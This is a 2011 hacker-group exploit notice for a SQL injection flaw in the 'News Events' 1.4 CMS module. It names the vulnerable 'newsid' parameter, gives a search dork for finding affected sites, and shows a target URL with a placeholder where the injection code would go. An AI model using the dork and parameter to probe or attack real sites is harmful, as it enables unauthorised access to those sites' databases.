News Events version 1.4 suffers from a remote SQL injection vulnerability.
47f66a1220ad3508d9358680dba785fdaa04de782d43acce06a59c3cb7acf61e
#########################################################################
[+] Exploit Title : Content Management newsevents 1.4 [ Sql Injection Vunerability ]
[~] Author : ThunDEr HeaD
[~] Contact : thunderhead10@gmail.com
[~] Date : 15-02-2011
[~] HomePage : www.indishell.in
[~] Dork : action=newsevents&newsid=
[~] Version : 1.4
[~] Tested on : Eduys
[~] Vulnerability Style : Content Management newsevents [ Sql Injection Vunerability ]
#########################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Greetz T0: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, Th3 RDX, G00g!3 W@rr!0r,
eXeSoul, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vulnerability :-
~ SQL injection Vulnerability ~
[#] http://targetsite/index.php?action=newsevents&newsid=11
[#] http://targetsite/index.php?action=newsevents&newsid=[SQLi code]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> c0d3 for motherland, h4ck for motherland
Enj0y! :D
[#] DOne now time to rock \m/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 15 feb 2011
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#